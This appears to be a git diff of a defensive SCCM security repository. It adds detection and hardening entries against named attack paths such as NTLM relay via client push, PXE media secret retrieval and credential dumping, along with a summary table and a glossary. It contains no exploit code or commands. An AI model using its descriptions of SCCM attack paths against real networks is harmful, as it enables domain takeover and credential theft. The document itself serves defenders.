An attacker may utilize LDAP requests targeting the domain controller's `System` container which contains the `System Management` container. This `System Management` container usually has `GenericAll` permissions set on the container object and contains the SCCM published site information. An attacker can query this container to resolve the potential site servers.
Defenders can set focused auditing on the `System Management` container to identify anomalous read access attempts. Defenders can enable a SACL (System Access Control List) on the `System Management` container and set the audit categories to monitor for `Read all properties`. Upon the querying of the `System Management` container within Active Directory Users and Computers, a [Event ID: 4662](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662) will highlight that a Read operation was performed on the container object.
@@ -1,11 +1,16 @@
# Plain English Title
# DETECT-3
## Code Name
SITE-TAKEOVERX
## Description
Monitor client push installation accounts authenticating from anywhere other than the primary site server
## Summary
## Examples
## Linked Defensive IDs
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../DETECT-1/detect-1_description.md)
## Associated Offensive IDs
- [ELEVATE-1: NTLM relay site server to SMB on site systems](../../../attack-techniques/ELEVATE/ELEVATE-1/ELEVATE-1_description.md)
- [ELEVATE-2: NTLM relay via automatic client push installation](../../../attack-techniques/ELEVATE/ELEVATE-2/ELEVATE-2_description.md)
## References
Author, Title, Link
@@ -1,7 +1,7 @@
# PREVENT-1
## Description
Patch Site Server with KB15599094
Patch site server with KB15599094
## Summary
@@ -22,6 +22,6 @@ This patch only applies to versions 2103+. If the installed version is older, Mi
- [ELEVATE-2: NTLM relay via automatic client push installation](../../../attack-techniques/ELEVATE/ELEVATE-2/ELEVATE-2_description.md)
## References
- Microsoft, NTLM client installation update for Microsoft Endpoint Configuration Manager, https://learn.microsoft.com/en-us/mem/configmgr/hotfix/2207/15599094
- Jitesh Kumar, SCCM Hotfix KB15599094 NTLM Client Installation Update, https://www.anoopcnair.com/sccm-hotfix-kb15599094-ntlm-client-installation/
- Brandon Colley, Push Comes To Shove: Bypassing Kerberos Authentication of SCCM Client Push Accounts, https://www.hub.trimarcsecurity.com/post/push-comes-to-shove-bypassing-kerberos-authentication-of-sccm-client-push-accounts
- Microsoft, [NTLM client installation update for Microsoft Endpoint Configuration Manager](https://learn.microsoft.com/en-us/mem/configmgr/hotfix/2207/15599094)
- Jitesh Kumar, [SCCM Hotfix KB15599094 NTLM Client Installation Update](https://www.anoopcnair.com/sccm-hotfix-kb15599094-ntlm-client-installation/)
- Brandon Colley, [Push Comes To Shove: Bypassing Kerberos Authentication of SCCM Client Push Accounts](https://www.hub.trimarcsecurity.com/post/push-comes-to-shove-bypassing-kerberos-authentication-of-sccm-client-push-accounts)
@@ -1,12 +1,13 @@
# PREVENT-10
## Description
Enforce the principle of least privilege for Configuration Manager accounts
Enforce the principle of least privilege for accounts
## Summary
Over-privileged accounts and unnecessary permissions are a common misconfiguration in Configuration Manager. It is paramount to ensure the various accounts in use are assigned only the necessary permissions to perform their function. This article does not cover every account. Do not use these accounts for multiple purposes.
Overprivileged accounts and unnecessary permissions are common misconfigurations in Configuration Manager. It is paramount to ensure the various accounts in use are assigned only the necessary permissions to perform their function. This article does not cover every account. Do not use these accounts for multiple purposes.
### Active Directory forest account
The site uses the Active Directory forest account to discover network infrastructure from Active Directory forests. Central administration sites and primary sites also use it to publish site data to Active Directory Domain Services for a forest.
### Capture OS image account
This account is used as part of task sequences. If configured, it may be deployed to various systems and recoverable as admininstrator on those systems.
@@ -101,7 +102,6 @@ This account is used by task sequences to connect to a network share.
- Do NOT assign interactive sign-in permissions
- Do NOT use the network access account
### Task sequence run as account
This account is used in task sequences to execute commands or scripts as an account other than the Local System account. This account should be configured with the minimum permissions necessary to complete the associated task sequence step. Create multiple run as accounts, each with tightly-scoped permissions for its specific task sequence step.
@@ -109,6 +109,11 @@ This account is used in task sequences to execute commands or scripts as an acco
- Do NOT use the network access account
- Do NOT use a domain administrator
### Collection Variables
One of the configuration settings that can be applied to collections are custom environment variables that are only exposed to members of the collection; these are called collection variables.
Nothing specifically requires that these variables be credentials, but they can be used for this purpose. In transit and on disk, they are encrypted by SCCM in the same way as credentials.
## Linked Defensive IDs
- [PREVENT-4: Enable Enhanced HTTP](../PREVENT-4/prevent-4_description.md)
@@ -120,4 +125,6 @@ This account is used in task sequences to execute commands or scripts as an acco
- [CRED-5: Dump SCCM credentials from site database](../../../attack-techniques/CRED/CRED-5/cred-5_description.md)
## References
- Microsoft, Accounts, https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts
- Microsoft, [Accounts used in Configuration Manager](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts)
- Christopher Panayi, [An inside look: How to distribute credentials securely in SCCM
](https://www.mwrcybersec.com/an-inside-look-how-to-distribute-credentials-securely-in-sccm)
@@ -1,6 +1,7 @@
# PREVENT-11
## Disable / Uninstall WebClient on site servers
## Description
Disable/uninstall WebClient on site servers
## Summary
`WebClient` is the name of the service used for WebDAV operations on Windows hosts. WebDAV is a protocol extension to HTTP that allows file operations, similar to SMB. By default, Windows will attempt to access a resource over SMB but will fallback to HTTP if `WebClient` is running. This is commonly used to coerce authentication from remote systems, as NTLM authentication over HTTP can be relayed to other protocols, such as LDAP.
@@ -11,7 +12,7 @@ This service is installed by default on workstation versions of Windows and can
-
## Associated Offensive IDs
- [TAKEOVER-8: Hierarchy takeover via NTLM coercion and relay HTTP to LDAP on domain controller](../../../attack-techniques/TAKEOVER/TAKEOVER-8/takeover-8_description.md)
- [TAKEOVER-8: NTLM relay primary site server HTTP to LDAP on domain controller](../../../attack-techniques/TAKEOVER/TAKEOVER-8/takeover-8_description.md)
## References
- Microsoft, Disable the WebDAV protocol, https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-interception-defense?tabs=group-policy#disable-the-webdav-protocol
@@ -1,4 +1,5 @@
# PREVENT-12
## Description
Require SMB signing on site systems
@@ -57,7 +58,7 @@ Both policies are located under `Default Domain Controllers Policy > Computer Co
- [TAKEOVER-2: Hierarchy takeover via NTLM coercion and relay to SMB on remote site databas](../../../attack-techniques/TAKEOVER/TAKEOVER-2/takeover-2_description.md)
- [TAKEOVER-6: Hierarchy takeover via NTLM coercion and relay to SMB on remote SMS Provider](../../../attack-techniques/TAKEOVER/TAKEOVER-6/takeover-6_description.md)
- [TAKEOVER-7: Hierarchy takeover via NTLM coercion and relay to SMB between primary and passive site servers](../../../attack-techniques/TAKEOVER/TAKEOVER-7/takeover-7_description.md)
- [ELEVATE-1: Hierarchy takeover via NTLM coercion and relay HTTP to LDAP on domain controller](../../../attack-techniques/ELEVATE/ELEVATE-1/ELEVATE-1_description.md)
- [ELEVATE-1: NTLM relay site server to SMB on site systems](../../../attack-techniques/ELEVATE/ELEVATE-1/ELEVATE-1_description.md)
- [ELEVATE-2: NTLM relay via automatic client push installation](../../../attack-techniques/ELEVATE/ELEVATE-2/ELEVATE-2_description.md)
## References
@@ -1,7 +1,7 @@
# TECHNIQUE ID
# PREVENT-14
## Description
This is a simple one-line description
Require EPA on AD CS and site databases
## Summary
This is the bulk of the content
@@ -1,7 +1,7 @@
# PREVENT-15
## Description
Disable and change passwords of legacy NAAs/collection variables/task sequences in Active Directory
Disable and change passwords of legacy NAAs and collection variables/task sequence secrets in Active Directory
## Summary
The [network access account](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) (NAA) is a domain account that can be configured on the site server. Clients use the NAA to access and retrieve software from a distribution point but serves no other purpose on the client. The credentials are retrieved by clients as part of the Computer Policy. Once received by the client, the credentials are stored in the `CCM_NetworkAccessAccount` class in the `root\ccm\policy\Machine\ActualConfig` WMI namespace.
@@ -24,4 +24,6 @@ The same prevention strategy applies to collection variables, which may include
- [CRED-4: Retrieve legacy secrets from the CIM repository](../../../attack-techniques/CRED/CRED-4/cred-4_description.md)
## References
- Duane Michael, The Phantom Credentials of SCCM: Why the NAA Won't Die, https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9
- Duane Michael, [The Phantom Credentials of SCCM: Why the NAA Won't Die](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
- Microsoft, [Network access account](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account)
- Christopher Panayi, [An inside look: How to distribute credentials securely in SCCM](https://www.mwrcybersec.com/an-inside-look-how-to-distribute-credentials-securely-in-sccm)
@@ -1,7 +1,7 @@
# TECHNIQUE ID
# PREVENT-16
## Description
This is a simple one-line description
Remove SeMachineAccountPrivilege and set MachineAccountQuota to 0 for non-admin accounts
## Summary
This is the bulk of the content
@@ -1,7 +1,7 @@
# PREVENT-17
## Description
Remove unnecessary privileges
Remove Extended Rights assignment from accounts that do not require it
## Summary
@@ -1,7 +1,7 @@
# TECHNIQUE ID
# PREVENT-18
## Description
This is a simple one-line description
Use strong passwords for DBA accounts
## Summary
This is the bulk of the content
@@ -1,6 +1,7 @@
# PREVENT-21
## Restrict PXE boot to authorized VLANs
## Description
Restrict PXE boot to authorized VLANs
## Summary
As outlined in [CRED-1](../../../attack-techniques/CRED/CRED-1/cred-1_description.md), if an adversary meets certain conditions, such as having line of sight to a PXE-enabled distribution point, they may be able to PXE boot or retrieve PXE boot media.
@@ -1,7 +1,7 @@
# TECHNIQUE ID
# PREVENT-22
## Description
This is a simple one-line description
Do not manage Tier 0 assets
## Summary
This is the bulk of the content
@@ -1,7 +1,7 @@
# PREVENT-3
## Description
Harden or Disable Network Access Account
Harden or disable network access accounts
## Summary
The [network access account](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) (NAA) is a domain account that can be configured on the site server. Clients use the NAA to access and retrieve software from a distribution point but serves no other purpose on the client. The credentials are retrieved by clients as part of the Computer Policy. Upon receipt, the client will encrypt the NAA using the Data Protection API (DPAPI).
@@ -33,10 +33,10 @@ _Figure 1 - Network access account configuration_
## Associated Offensive IDs
- [CRED-1: Retrieve secrets from PXE boot media](../../../attack-techniques/CRED/CRED-1/cred-1_description.md)
- [CRED-2: Request and deobfuscate machine policy to retrieve credential material](../../../attack-techniques/CRED/CRED-2/cred-2_description.md)
- [CRED-3: Dump network access account (NAA) credentials via WMI](../../../attack-techniques/CRED/CRED-3/cred-3_description.md)
- [CRED-4: Retrieve legacy network access account (NAA) credentials from the CIM Repository](../../../attack-techniques/CRED/CRED-4/cred-4_description.md)
- [CRED-5: Dump SCCM Credentials from Site Database](../../../attack-techniques/CRED/CRED-5/cred-5_description.md)
- [CRED-2: Request machine policy and deobfuscate secrets](../../../attack-techniques/CRED/CRED-2/cred-2_description.md)
- [CRED-3: Dump currently deployed secrets via WMI](../../../attack-techniques/CRED/CRED-3/cred-3_description.md)
- [CRED-4: Retrieve legacy secrets from the CIM repository](../../../attack-techniques/CRED/CRED-4/cred-4_description.md)
- [CRED-5: Dump credentials from the site database](../../../attack-techniques/CRED/CRED-5/cred-5_description.md)
## References
- Microsoft, Network access account, https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account
@@ -14,14 +14,14 @@ _Figure 1 - Enhanced HTTP Diagram_
## Linked Defensive IDs
- [PREVENT-3: Harden or Disable Network Access Account](../PREVENT-3/prevent-3_description.md)
- [PREVENT-3: Harden or disable network access accounts](../PREVENT-3/prevent-3_description.md)
- [PREVENT-8: Require PKI certificates for client authentication](../PREVENT-8/prevent-8_description.md)
- [PREVENT-15: Disable legacy network access accounts in Active Directory](../PREVENT-15/prevent-15_description.md)
## Associated Offensive IDs
- [CRED-2: Request and deobfuscate machine policy to retrieve credential material](../../../attack-techniques/CRED/CRED-2/cred-2_description.md)
- [CRED-3: Dump network access account (NAA) credentials via WMI](../../../attack-techniques/CRED/CRED-3/cred-3_description.md)
- [CRED-4: Retrieve legacy network access account (NAA) credentials from the CIM Repository](../../../attack-techniques/CRED/CRED-4/cred-4_description.md)
- [CRED-2: Request machine policy and deobfuscate secrets](../../../attack-techniques/CRED/CRED-2/cred-2_description.md)
- [CRED-3: Dump currently deployed secrets via WMI](../../../attack-techniques/CRED/CRED-3/cred-3_description.md)
- [CRED-4: Retrieve legacy secrets from the CIM repository](../../../attack-techniques/CRED/CRED-4/cred-4_description.md)
## References
- Christopher Panayi, An inside look: How to distribute credentials securely in SCCM, https://www.mwrcybersec.com/an-inside-look-how-to-distribute-credentials-securely-in-sccm
@@ -1,7 +1,7 @@
# PREVENT-6
## Description
Configure strong PXE boot password
Configure a strong PXE boot password
## Summary
@@ -10,7 +10,7 @@ Enforce MFA for SMS Provider calls
- N/A
## Associated Offensive IDs
- N/A
- [EXEC-1: Application deployment](../../../attack-techniques/EXEC/EXEC-1/exec-1_description.md)
## References
Microsoft, Enable MFA for SMS Provider Calls, https://learn.microsoft.com/en-us/troubleshoot/mem/configmgr/setup-migrate-backup-recovery/enable-mfa-for-sms-provider-calls
+31 -31
View File
@@ -1,31 +1,31 @@
| Codname | Description | Notes | Links | Status |
|---------|-------------|-------| ----- | ------ |
| CANARY-1 | Configure an appropriately-privileged NAA with interactive logon restricted |
| CANARY-2 | Configure a minimally privileged client push account |
| DETECT-1 | Monitor site server domain computer accounts authenticating from another source |
| DETECT-2 | Monitor the read access requests of the System Management container within Active Directory Users and Computers | | | X
| DETECT-3 | Monitor client push installation accounts authenticating from anywhere other than the primary site server |
| DETECT-4 | Monitor application deployment logs in the site's Audit Status Messages |
| DETECT-5 | Monitor group membership changes for SMS Admins | | TAKEOVER-2 |
| PREVENT-1 | Patch site server with KB15599094 | | | QA
| PREVENT-2 | Disable Fallback to NTLM | | TAKEOVER-1| QA
| PREVENT-3 | Harden or disable network access accounts | | CRED-1, CRED-2, CRED-3 | QA
| PREVENT-4 | Configure Enhanced HTTP | | CRED-2, CRED-3, CRED-4, PREVENT-3, PREVENT-8, PREVENT-15| QA
| PREVENT-5 | Disable automatic side-wide client push installation | | PREVENT-2 | QA
| PREVENT-6 | Configure a strong PXE boot password | Prevents cracking to obtain OSD secrets | CRED-1 | QA
| PREVENT-7 | Disable command support in PXE boot configuration| Prevents entering "F8-debugging" | CRED-1 | QA
| PREVENT-8 | Require PKI certificates for client authentation | Prevents rogue device registration | TAKEOVER-2 |
| PREVENT-9 | Enforce MFA for SMS Provider calls | | RECON-4, TAKEOVER-2 |
| PREVENT-10 | Enforce the principle of least privilege for accounts | | | QA
| PREVENT-11 | Disable/uninstall WebClient on site servers | Prevents NTLM coercion over HTTP | | QA
| PREVENT-12 | Require SMB signing on site systems | Prevents SMB relay | TAKEOVER-1 | QA
| PREVENT-13 | Require LDAP channel binding and signing | Prevents relay to LDAP | | QA
| PREVENT-14 | Require EPA on AD CS and site databases | Prevents relay to HTTP and MSSQL | TAKEOVER-1
| PREVENT-15 | Disable and change passwords of legacy NAAs and collection variables/task sequence secrets in Active Directory |
| PREVENT-16 | Remove SeMachineAccountPrivilege and set MachineAccountQuota to 0 for non-admin accounts | Prevent users from adding machine accounts
| PREVENT-17 | Remove Extended Rights assignment from accounts that do not require it | Prevents GetLapsPassword for created accounts |
| PREVENT-18 | Use strong passwords for DBA accounts | | |
| PREVENT-19 | Remove unnecessary links to site databases | | | QA
| PREVENT-20 | Block unnecessary connections to site systems | Reduces coercion via SMB and relay to SMB/MSSQL
| PREVENT-21 | Restrict PXE boot to authorized VLANs | | | QA
| PREVENT-22 | Do not manage Tier 0 assets |
| Codname | Description | Admin Roles |
|---------|-------------|-------------|
| CANARY-1 | Configure an appropriately-privileged NAA with interactive logon restricted | SCCM, domain |
| CANARY-2 | Configure a minimally privileged client push account | SCCM, domain |
| DETECT-1 | Monitor site server domain computer accounts authenticating from another source | Security |
| DETECT-2 | Monitor the read access requests of the System Management container within Active Directory Users and Computers | Security |
| DETECT-3 | Monitor client push installation accounts authenticating from anywhere other than the primary site server | Security |
| DETECT-4 | Monitor application deployment logs in the site's Audit Status Messages | SCCM, security |
| DETECT-5 | Monitor group membership changes for SMS Admins | SCCM, server, security |
| PREVENT-1 | Patch site server with KB15599094 | SCCM, server |
| PREVENT-2 | Disable Fallback to NTLM | SCCM |
| PREVENT-3 | Harden or disable network access accounts | SCCM, domain, security |
| PREVENT-4 | Configure Enhanced HTTP | SCCM |
| PREVENT-5 | Disable automatic side-wide client push installation | SCCM |
| PREVENT-6 | Configure a strong PXE boot password | SCCM |
| PREVENT-7 | Disable command support in PXE boot configuration| SCCM |
| PREVENT-8 | Require PKI certificates for client authentation | SCCM, network, security, server, domain |
| PREVENT-9 | Enforce MFA for SMS Provider calls | SCCM |
| PREVENT-10 | Enforce the principle of least privilege for accounts | SCCM, domain, server, security |
| PREVENT-11 | Disable/uninstall WebClient on site servers | SCCM, server |
| PREVENT-12 | Require SMB signing on site systems | Domain, server, SCCM |
| PREVENT-13 | Require LDAP channel binding and signing | Domain, server |
| PREVENT-14 | Require EPA on AD CS and site databases | Domain, security, SCCM, server, database |
| PREVENT-15 | Disable and change passwords of legacy NAAs and collection variables/task sequence secrets in Active Directory | Domain, SCCM |
| PREVENT-16 | Remove SeMachineAccountPrivilege and set MachineAccountQuota to 0 for non-admin accounts | Domain |
| PREVENT-17 | Remove Extended Rights assignment from accounts that do not require it | Domain, desktop |
| PREVENT-18 | Use strong passwords for DBA accounts | Database, security, domain |
| PREVENT-19 | Remove unnecessary links to site databases | SCCM, database |
| PREVENT-20 | Block unnecessary connections to site systems | Network, server |
| PREVENT-21 | Restrict PXE boot to authorized VLANs | SCCM, network |
| PREVENT-22 | Do not manage Tier 0 assets | SCCM, security |
-86
View File
@@ -1,86 +0,0 @@
# SCCM Foundational Knowledge
Familiarity with the terms and concepts presented on this page are required for understanding the various attack and defense techniques covered in this repository.
## SCCM
A client-server solution commonly used to deploy software and updates to Windows systems, currently named Microsoft Configuration Manager (ConfigMgr, Config Man, or MCM), but formerly:
- Microsoft Endpoint Configuration Manager (MECM)
- Microsoft Endpoint Manager Configuration Manager (MEMCM)
- System Center Configuration Manager (SCCM)
- Systems Management Server (SMS)
## Hierarchy
All of the sites in one instance of SCCM
## Site
The SCCM site consists of the various systems that compose the SCCM environment. Each site is identified by a three character site code (e.g., PS1).
## Client/Device
SCCM clients are systems that are joined to, managed by, and receive content from an SCCM site.
## Primary Site
A site that clients are assigned to and that is administered using the Configuration Manager console.
## Primary Site Server
The server responsible for processing client-generated data and interacting with the site database. Also referred to as the site server.
## Passive Site Server
A failover primary site server used for redundancy in high availability configurations
## Secondary Site
A child of a primary site used to distribute content to clients in remote locations with low bandwidth connections
## Central Administration Site
An optional top-level site that can be used to manage multiple primary sites
## Site System
A computer that is assigned one or more site system roles in the site.
## Site System Role
A role installed on a site system to host functionality for a site (e.g., site server, site database, distribution point)
## Site Database
A required site system role for central administration sites, primary sites, and secondary sites that stores and processes data. This database is fully replicated between CAS sites and primary sites and partially replicated to secondary sites.
## Site Database Server
Hosts the site database for a site, can be colocated on the site server or hosted on a remote system.
## SMS Provider
A site system with Windows Management Instrumentation (WMI) and HTTPS REST API providers that allow indirect access to the site database. This role is installed on the primary site server by default but can also be installed elsewhere. SharpSCCM interacts with SMS providers via WMI and HTTP(S).
## Management Point
A site system that receives client configuration data, forwards it to the site server to be processed, and responds to client requests for policy and service locations. SharpSCCM interacts with management points via HTTP(S).
## Discovery Methods
Configurable methods the site uses to discover computers.
## Boundary Group
Network locations (e.g., IP subnets/address ranges, Active Directory sites) that include client systems managed by the site.
## Automatic Site Assignment
A setting that automatically assigns systems discovered in a specific boundary group to a specific site (e.g., all systems discovered in AD domain X are automatically assigned to site Y). This setting must be configured by the SCCM admin to enable automatic site-wide client push installation.
## Client Push Installation
A method for deploying the SCCM client software where the site server connects to a machines ADMIN$ share, copies over the files needed for installation, and executes the installer (ccmsetup.exe). By default, this connection occurs over SMB, but can occur over HTTP if WebClient is enabled on the site server and the target machines NetBIOS name is set to a value that specifies a port number (e.g., machine@8080).
## Client Push Installation Accounts
The list of accounts that the site server tries to authenticate with to install the client. By default, if none of the configured accounts can successfully authenticate, or if no accounts are configured, the site server attempts to authenticate with its machine account.
## Automatic Site-wide Client Push Installation
When automatic site assignment and this setting are enabled, the site automatically tries client push installation on any computers it discovers within a boundary group. This option is not enabled by default.
## Allow connection fallback to NTLM
A client push installation setting that allows the server to attempt NTLM authentication when Kerberos authentication fails. This option is enabled by default.
Beginning with Configuration Manager current branch, version 2207, the “Allow connection fallback to NTLM” option is disabled by default on new site installations. Hotfix KB15599094 must be applied to existing installations for the “Allow connection fallback to NTLM” setting to prevent NTLM connections from occurring when disabled.
## Registration Request
A message sent to the management point to register a new client with the site.
## ConfigMgr Console
The software that administrators use to manage a site
## Security Role
A set of permissions applied to admin users to control access to SCCM objects (e.g., sites, device collections) and actions (e.g., read, modify, deploy)
## Security Scope
A container of objects to which a security role can be granted access (e.g., an admin is granted the permissions in security role A to the objects added to security scope B)